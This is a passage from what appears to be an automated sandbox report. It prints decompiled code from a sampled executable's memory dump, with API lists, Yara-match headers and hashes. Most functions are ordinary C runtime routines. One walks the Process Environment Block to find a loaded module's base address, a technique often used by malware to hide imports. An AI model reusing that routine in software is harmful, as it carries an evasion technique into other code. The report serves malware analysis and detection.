                                        										L40:
                                        										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
                                        										if(_t228 != 0) {
                                        											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        										}
                                        										goto L43;
                                        									}
                                        									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
                                        									if(_t228 != 0) {
                                        										goto L78;
                                        									}
                                        									goto L40;
                                        								}
                                        								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
                                        								if(_t228 != 0) {
                                        									goto L78;
                                        								}
                                        								goto L38;
                                        							}
                                        							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
                                        							if(_t228 != 0) {
                                        								goto L78;
                                        							}
                                        							goto L36;
                                        						}
                                        						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
                                        						if(_t305 == 0) {
                                        							L25:
                                        							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
                                        							if(_t307 == 0) {
                                        								L27:
                                        								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
                                        								if(_t309 == 0) {
                                        									L29:
                                        									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
                                        									if(_t228 != 0) {
                                        										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        									}
                                        									goto L32;
                                        								}
                                        								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
                                        								if(_t228 != 0) {
                                        									goto L78;
                                        								}
                                        								goto L29;
                                        							}
                                        							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
                                        							if(_t228 != 0) {
                                        								goto L78;
                                        							}
                                        							goto L27;
                                        						}
                                        						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
                                        						if(_t228 != 0) {
                                        							goto L78;
                                        						}
                                        						goto L25;
                                        					}
                                        					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
                                        					if(_t311 == 0) {
                                        						L14:
                                        						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
                                        						if(_t313 == 0) {
                                        							L16:
                                        							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
                                        							if(_t315 == 0) {
                                        								L18:
                                        								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
                                        								if(_t228 != 0) {
                                        									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        								}
                                        								goto L21;
                                        							}
                                        							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
                                        							if(_t228 != 0) {
                                        								goto L78;
                                        							}
                                        							goto L18;
                                        						}
                                        						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
                                        						if(_t228 != 0) {
                                        							goto L78;
                                        						}
                                        						goto L16;
                                        					}
                                        					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
                                        					if(_t228 != 0) {
                                        						goto L78;
                                        					}
                                        					goto L14;
                                        				}
                                        				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                        				if(_t317 == 0) {
                                        					L3:
                                        					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
                                        					if(_t319 == 0) {
                                        						L5:
                                        						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
                                        						if(_t321 == 0) {
                                        							L7:
                                        							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
                                        							if(_t228 != 0) {
                                        								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                                        							}
                                        							goto L10;
                                        						}
                                        						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
                                        						if(_t228 != 0) {
                                        							goto L78;
                                        						}
                                        						goto L7;
                                        					}
                                        					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
                                        					if(_t228 != 0) {
                                        						goto L78;
                                        					}
                                        					goto L5;
                                        				}
                                        				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
                                        				if(_t228 != 0) {
                                        					goto L78;
                                        				}
                                        				goto L3;
                                        			}


































                                        0x0106b285
                                        0x0106b28d
                                        0x0106b28f
                                        0x0106b298
                                        0x0106b298
                                        0x00000000
                                        0x0106b28f
                                        0x0106b276
                                        0x0106b27f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b27f
                                        0x0106b254
                                        0x0106b25d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b25d
                                        0x0106b232
                                        0x0106b23b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b23b
                                        0x0106b190
                                        0x0106b192
                                        0x0106b1aa
                                        0x0106b1b2
                                        0x0106b1b4
                                        0x0106b1cc
                                        0x0106b1d4
                                        0x0106b1d6
                                        0x0106b1ee
                                        0x0106b1f6
                                        0x0106b1f8
                                        0x0106b201
                                        0x0106b201
                                        0x00000000
                                        0x0106b1f8
                                        0x0106b1df
                                        0x0106b1e8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b1e8
                                        0x0106b1bd
                                        0x0106b1c6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b1c6
                                        0x0106b19b
                                        0x0106b1a4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b1a4
                                        0x0106b0f9
                                        0x0106b0fb
                                        0x0106b113
                                        0x0106b11b
                                        0x0106b11d
                                        0x0106b135
                                        0x0106b13d
                                        0x0106b13f
                                        0x0106b157
                                        0x0106b15f
                                        0x0106b161
                                        0x0106b16a
                                        0x0106b16a
                                        0x00000000
                                        0x0106b161
                                        0x0106b148
                                        0x0106b151
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b151
                                        0x0106b126
                                        0x0106b12f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b12f
                                        0x0106b104
                                        0x0106b10d
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
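                                        			E01077A20() {
                                        				// Walks the loader data via the PEB (32-bit): fs:[0x30] -> PEB,
                                        				// PEB+0xc -> Ldr, Ldr+0xc -> InLoadOrderModuleList; two further
                                        				// dereferences reach the third module entry, and +0x18 is its DllBase.
                                        				return *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                        			}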



                                        0x01077a33

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E01068E85(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr _t12;
                                        				intOrPtr _t13;
                                        				intOrPtr _t15;
                                        				intOrPtr _t22;
                                        				intOrPtr* _t42;
                                        
                                        				if(_a4 > 5 || _a8 == 0) {
                                        					L4:
                                        					return 0;
                                        				} else {
                                        					_t42 = E010632EE(8, 1);
                                        					_t48 = _t42;
                                        					if(_t42 != 0) {
                                        						_t12 = E010632EE(0xb8, 1);
                                        						 *_t42 = _t12;
                                        						__eflags = _t12;
                                        						if(_t12 != 0) {
                                        							_t13 = E010632EE(0x220, 1);
                                        							 *((intOrPtr*)(_t42 + 4)) = _t13;
                                        							__eflags = _t13;
                                        							if(_t13 != 0) {
                                        								E0106899A( *_t42, 0x107e2e8);
                                        								_t15 = E01069285(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
                                        								_push( *((intOrPtr*)(_t42 + 4)));
                                        								__eflags = _t15;
                                        								if(__eflags == 0) {
                                        									L14:
                                        									E010632B6();
                                        									E0106363B( *_t42);
                                        									E010634E1( *_t42);
                                        									E010632B6(_t42);
                                        									_t42 = 0;
                                        									L16:
                                        									return _t42;
                                        								}
                                        								_push( *((intOrPtr*)( *_t42 + 4)));
                                        								_t22 = E01063D75(__edx, 1, __eflags);
                                        								__eflags = _t22;
                                        								if(_t22 == 0) {
                                        									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
                                        									goto L16;
                                        								}
                                        								_push( *((intOrPtr*)(_t42 + 4)));
                                        								goto L14;
                                        							}
                                        							E010632B6( *_t42);
                                        							E010632B6(_t42);
                                        							L8:
                                        							goto L3;
                                        						}
                                        						E010632B6(_t42);
                                        						goto L8;
                                        					}
                                        					L3:
                                        					 *((intOrPtr*)(E01064196(_t48))) = 0xc;
                                        					goto L4;
                                        				}
                                        			}












                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 1503006713-0
                                        • Opcode ID: 9946b614709d4a7d4f53895f8b27c2e6bd6d6a945d02e042357d1777cd682725
                                        • Instruction ID: afbdd92a562c442b85e8f65c81aa0ca17e4ce2b9ec2fcc4ccf0fcc0ae5777c7f
                                        • Opcode Fuzzy Hash: 9946b614709d4a7d4f53895f8b27c2e6bd6d6a945d02e042357d1777cd682725
                                        • Instruction Fuzzy Hash: 8F21A135508713EAEB327F69DC01A8BBBEDEF61754B10846AE9CD99160EE328400C695
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        			E0106197C(void* __eax, void* __ebx) {
                                        				intOrPtr _t5;
                                        				intOrPtr _t6;
                                        				intOrPtr _t7;
                                        				intOrPtr _t8;
                                        				void* _t9;
                                        				void* _t14;
                                        				void* _t24;
                                        				intOrPtr* _t25;
                                        				signed int _t26;
                                        				signed int _t27;
                                        				intOrPtr _t39;
                                        
                                        				_t14 = __ebx;
                                        				__imp__DecodePointer( *0x10c1b34);
                                        				_t25 =  *0x10bfcfc; // 0x0
                                        				_t24 = __eax;
                                        				if(_t25 == 0) {
                                        					L4:
                                        					_push(_t14);
                                        					E010632B6(_t25);
                                        					_t26 =  *0x10bfcf8; // 0x12e0f40
                                        					 *0x10bfcfc = 0;
                                        					if(_t26 == 0) {
                                        						L8:
                                        						E010632B6(_t26);
                                        						 *0x10bfcf8 = 0;
                                        						E010632B6( *0x10bfcf4);
                                        						_t5 = E010632B6( *0x10bfcf0);
                                        						_t27 = _t26 | 0xffffffff;
                                        						 *0x10bfcf4 = 0;
                                        						 *0x10bfcf0 = 0;
                                        						if(_t24 != _t27) {
                                        							_t39 =  *0x10c1b34; // 0x79d9729f
                                        							if(_t39 != 0) {
                                        								_t5 = E010632B6(_t24);
                                        							}
                                        						}
                                        						__imp__EncodePointer(_t27);
                                        						 *0x10c1b34 = _t5;
                                        						_t6 =  *0x10c06f4; // 0x0
                                        						if(_t6 != 0) {
                                        							E010632B6(_t6);
                                        							 *0x10c06f4 = 0;
                                        						}
                                        						_t7 =  *0x10c06f8; // 0x0
                                        						if(_t7 != 0) {
                                        							E010632B6(_t7);
                                        							 *0x10c06f8 = 0;
                                        						}
                                        						_t8 =  *0x107e7d4; // 0x12de060
                                        						asm("lock xadd [eax], esi");
                                        						if(_t27 != 1) {
                                        							L18:
                                        							return _t8;
                                        						} else {
                                        							_t8 =  *0x107e7d4; // 0x12de060
                                        							if(_t8 == 0x107e5b0) {
                                        								goto L18;
                                        							}
                                        							_t9 = E010632B6(_t8);
                                        							 *0x107e7d4 = 0x107e5b0;
                                        							return _t9;
                                        						}
                                        					}
                                        					while( *_t26 != 0) {
                                        						E010632B6( *_t26);
                                        						_t26 = _t26 + 4;
                                        						if(_t26 != 0) {
                                        							continue;
                                        						}
                                        						break;
                                        					}
                                        					_t26 =  *0x10bfcf8; // 0x12e0f40
                                        					goto L8;
                                        				}
                                        				while( *_t25 != 0) {
                                        					E010632B6( *_t25);
                                        					_t25 = _t25 + 4;
                                        					if(_t25 != 0) {
                                        						continue;
                                        					}
                                        					break;
                                        				}
                                        				_t25 =  *0x10bfcfc; // 0x0
                                        				goto L4;
                                        			}















                                        APIs
                                        • DecodePointer.KERNEL32 ref: 01061984
                                        • _free.LIBCMT ref: 0106199D
                                          • Part of subcall function 010632B6: HeapFree.KERNEL32(00000000,00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632CA
                                          • Part of subcall function 010632B6: GetLastError.KERNEL32(00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632DC
                                        • _free.LIBCMT ref: 010619B0
                                        • _free.LIBCMT ref: 010619CE
                                        • _free.LIBCMT ref: 010619E0
                                        • _free.LIBCMT ref: 010619F1
                                        • _free.LIBCMT ref: 010619FC
                                        • _free.LIBCMT ref: 01061A20
                                        • EncodePointer.KERNEL32(012E0F40), ref: 01061A27
                                        • _free.LIBCMT ref: 01061A3C
                                        • _free.LIBCMT ref: 01061A52
                                        • _free.LIBCMT ref: 01061A7A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 3064303923-0
                                        • Opcode ID: 258079cd973722d4e3908e362d51587362773bf04d3cfca1f53f5b5165ad446a
                                        • Instruction ID: a17bde0e0b59de6b1cfcdf2f924f9eeba8bb176dc4785910cc9ca4401e96ef6d
                                        • Opcode Fuzzy Hash: 258079cd973722d4e3908e362d51587362773bf04d3cfca1f53f5b5165ad446a
                                        • Instruction Fuzzy Hash: 8F217E71D021538FD7719F58F9C0989BBE9BB4472032500AAEDD8A734DDE3A4884CBD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E01068F5C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
                                        				signed int _v8;
                                        				signed int _v32;
                                        				intOrPtr _v36;
                                        				signed int _v40;
                                        				void* _t38;
                                        				signed int _t45;
                                        				signed int _t60;
                                        				intOrPtr _t77;
                                        				void* _t80;
                                        				intOrPtr* _t82;
                                        				signed int _t83;
                                        				signed int _t86;
                                        				intOrPtr _t88;
                                        				void* _t92;
                                        
                                        				_t80 = __edx;
                                        				_push(__ebx);
                                        				_push(__esi);
                                        				_t86 = 0;
                                        				if(_a12 <= 0) {
                                        					L5:
                                        					return _t38;
                                        				} else {
                                        					_push(__edi);
                                        					_t82 =  &_a12;
                                        					while(1) {
                                        						_t82 = _t82 + 4;
                                        						_t38 = E0106551B(_a4, _a8,  *_t82);
                                        						_t92 = _t92 + 0xc;
                                        						if(_t38 != 0) {
                                        							break;
                                        						}
                                        						_t86 = _t86 + 1;
                                        						if(_t86 < _a12) {
                                        							continue;
                                        						} else {
                                        							goto L5;
                                        						}
                                        						goto L20;
                                        					}
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					_push(0);
                                        					E01064112(0, _t80);
                                        					asm("int3");
                                        					_push(0x14);
                                        					_push(0x107cf88);
                                        					E010627F0(0, _t82, _t86);
                                        					_t66 = 0;
                                        					_v32 = 0;
                                        					__eflags = _a4 - 5;
                                        					if(__eflags <= 0) {
                                        						_t88 = E010615FE();
                                        						_v36 = _t88;
                                        						E010636DB(0, _t80, _t82, _t88, __eflags);
                                        						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
                                        						_v8 = _v8 & 0;
                                        						_t83 = E010632EE(0xb8, 1);
                                        						_v40 = _t83;
                                        						__eflags = _t83;
                                        						if(_t83 != 0) {
                                        							E01063117(0xc);
                                        							_v8 = 1;
                                        							E0106899A(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
                                        							_v8 = _v8 & 0x00000000;
                                        							E010690D1();
                                        							_t66 = E01069285(0, _t80, _t83, _t88, _t83, _a4, _a8);
                                        							_v32 = _t66;
                                        							__eflags = _t66;
                                        							if(_t66 == 0) {
                                        								E0106363B(_t83);
                                        								_t43 = E010634E1(_t83);
                                        							} else {
                                        								__eflags = _a8;
                                        								if(_a8 != 0) {
                                        									_t60 = E0106DB06(_a8, 0x107e17c);
                                        									__eflags = _t60;
                                        									if(_t60 != 0) {
                                        										 *0x10c0a44 = 1;
                                        									}
                                        								}
                                        								E01063117(0xc);
                                        								_v8 = 2;
                                        								_t25 = _t88 + 0x6c; // 0x6c
                                        								E0106375B(_t25, _t83);
                                        								E0106363B(_t83);
                                        								__eflags =  *(_t88 + 0x70) & 0x00000002;
                                        								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
                                        									__eflags =  *0x107ecf4 & 0x00000001;
                                        									if(( *0x107ecf4 & 0x00000001) == 0) {
                                        										E0106375B(0x107e2e4,  *((intOrPtr*)(_t88 + 0x6c)));
                                        										_t77 =  *0x107e2e4; // 0x107e2e8
                                        										_t32 = _t77 + 0x84; // 0x107ed00
                                        										 *0x107ecf8 =  *_t32;
                                        										_t33 = _t77 + 0x90; // 0x1079570
                                        										 *0x107ed54 =  *_t33;
                                        										_t34 = _t77 + 0x74; // 0x1
                                        										 *0x107e178 =  *_t34;
                                        									}
                                        								}
                                        								_v8 = _v8 & 0x00000000;
                                        								_t43 = E010690E0();
                                        							}
                                        						}
                                        						_v8 = 0xfffffffe;
                                        						E01069113(_t43, _t88);
                                        						_t45 = _t66;
                                        					} else {
                                        						 *((intOrPtr*)(E01064196(__eflags))) = 0x16;
                                        						E010640E7();
                                        						_t45 = 0;
                                        					}
                                        					return E01062835(_t45);
                                        				}
                                        				L20:
                                        			}


















                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 790675137-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E010617CB(void* __edx, char* _a4, short* _a8) {
                                        				int _v8;
                                        				void* __ecx;
                                        				intOrPtr* _t7;
                                        				intOrPtr _t9;
                                        				short* _t10;
                                        				short* _t12;
                                        				short* _t14;
                                        				int _t15;
                                        				short* _t22;
                                        				int _t24;
                                        				void* _t27;
                                        				void* _t31;
                                        				short* _t33;
                                        				intOrPtr _t34;
                                        
                                        				_t31 = __edx;
                                        				_push(_t27);
                                        				_t24 = 0;
                                        				_t36 = _a4;
                                        				if(_a4 != 0) {
                                        					_t33 = _a8;
                                        					__eflags = _t33;
                                        					if(__eflags == 0) {
                                        						goto L1;
                                        					}
                                        					_t10 = E01062D64(_t27);
                                        					__eflags = _t10;
                                        					if(_t10 == 0) {
                                        						_t22 = AreFileApisANSI();
                                        						__eflags = _t22;
                                        						if(_t22 == 0) {
                                        							_t24 = 1;
                                        							__eflags = 1;
                                        						}
                                        					}
                                        					 *_t33 = 0;
                                        					_t12 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, 0, 0);
                                        					_v8 = _t12;
                                        					__eflags = _t12;
                                        					if(_t12 != 0) {
                                        						_t14 = E01063336(_t31, _t12 + _t12);
                                        						 *_t33 = _t14;
                                        						__eflags = _t14;
                                        						if(_t14 == 0) {
                                        							goto L9;
                                        						}
                                        						_t15 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, _t14, _v8);
                                        						__eflags = _t15;
                                        						if(_t15 != 0) {
                                        							_t9 = 1;
                                        							__eflags = 1;
                                        							goto L14;
                                        						}
                                        						E01064175(GetLastError());
                                        						E010632B6( *_t33);
                                        						 *_t33 =  *_t33 & 0x00000000;
                                        						goto L8;
                                        					} else {
                                        						E01064175(GetLastError());
                                        						L8:
                                        						L9:
                                        						_t9 = 0;
                                        						L14:
                                        						return _t9;
                                        					}
                                        				}
                                        				L1:
                                        				_t7 = E01064196(_t36);
                                        				_t34 = 0x16;
                                        				 *_t7 = _t34;
                                        				E010640E7();
                                        				_t9 = _t34;
                                        				goto L14;
                                        			}

                                        APIs
                                        • ___crtIsPackagedApp.LIBCMT ref: 010617F5
                                        • AreFileApisANSI.KERNEL32 ref: 010617FE
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061818
                                        • GetLastError.KERNEL32 ref: 01061825
                                        • __dosmaperr.LIBCMT ref: 0106182C
                                          • Part of subcall function 01064196: __getptd_noexit.LIBCMT ref: 01064196
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
                                        • String ID:
                                        • API String ID: 1083238821-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 91%
                                        			E01061738(void* __ebx, void* __edi, void* __eflags) {
                                        				void* __esi;
                                        				void* _t3;
                                        				intOrPtr _t6;
                                        				long _t14;
                                        				long* _t27;
                                        
                                        				E01061BC7(_t3);
                                        				if(E01063268() != 0) {
                                        					_t6 = E01062BEF(E01061493);
                                        					 *0x107e000 = _t6;
                                        					__eflags = _t6 - 0xffffffff;
                                        					if(_t6 == 0xffffffff) {
                                        						goto L1;
                                        					} else {
                                        						_t27 = E010632EE(1, 0x3bc);
                                        						__eflags = _t27;
                                        						if(_t27 == 0) {
                                        							L6:
                                        							E010617AE();
                                        							__eflags = 0;
                                        							return 0;
                                        						} else {
                                        							__eflags = E01062C4B( *0x107e000, _t27);
                                        							if(__eflags == 0) {
                                        								goto L6;
                                        							} else {
                                        								_push(0);
                                        								_push(_t27);
                                        								E01061685(__ebx, __edi, _t27, __eflags);
                                        								_t14 = GetCurrentThreadId();
                                        								_t27[1] = _t27[1] | 0xffffffff;
                                        								 *_t27 = _t14;
                                        								__eflags = 1;
                                        								return 1;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					L1:
                                        					E010617AE();
                                        					return 0;
                                        				}
                                        			}

                                        APIs
                                        • __init_pointers.LIBCMT ref: 01061738
                                          • Part of subcall function 01061BC7: RtlEncodePointer.NTDLL(00000000,?,0106173D,0106112C,0107CCC0,00000014), ref: 01061BCA
                                          • Part of subcall function 01061BC7: __initp_misc_winsig.LIBCMT ref: 01061BE5
                                          • Part of subcall function 01061BC7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 01062DAE
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 01062DC2
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 01062DD5
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 01062DE8
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 01062DFB
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 01062E0E
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 01062E21
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 01062E34
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 01062E47
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 01062E5A
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 01062E6D
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 01062E80
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 01062E93
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 01062EA6
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 01062EB9
                                          • Part of subcall function 01061BC7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 01062ECC
                                        • __mtinitlocks.LIBCMT ref: 0106173D
                                        • __mtterm.LIBCMT ref: 01061746
                                          • Part of subcall function 010617AE: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,0106174B,0106112C,0107CCC0,00000014), ref: 01063182
                                          • Part of subcall function 010617AE: _free.LIBCMT ref: 01063189
                                          • Part of subcall function 010617AE: DeleteCriticalSection.KERNEL32(0107E058,?,?,0106174B,0106112C,0107CCC0,00000014), ref: 010631AB
                                        • __calloc_crt.LIBCMT ref: 0106176B
                                        • __initptd.LIBCMT ref: 0106178D
                                        • GetCurrentThreadId.KERNEL32 ref: 01061794
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                        • String ID:
                                        • API String ID: 3567560977-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0106879C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				void* _t10;
                                        				signed int _t12;
                                        				intOrPtr* _t16;
                                        				intOrPtr* _t31;
                                        				void* _t32;
                                        
                                        				_push(8);
                                        				_push(0x107cf60);
                                        				_t10 = E010627F0(__ebx, __edi, __esi);
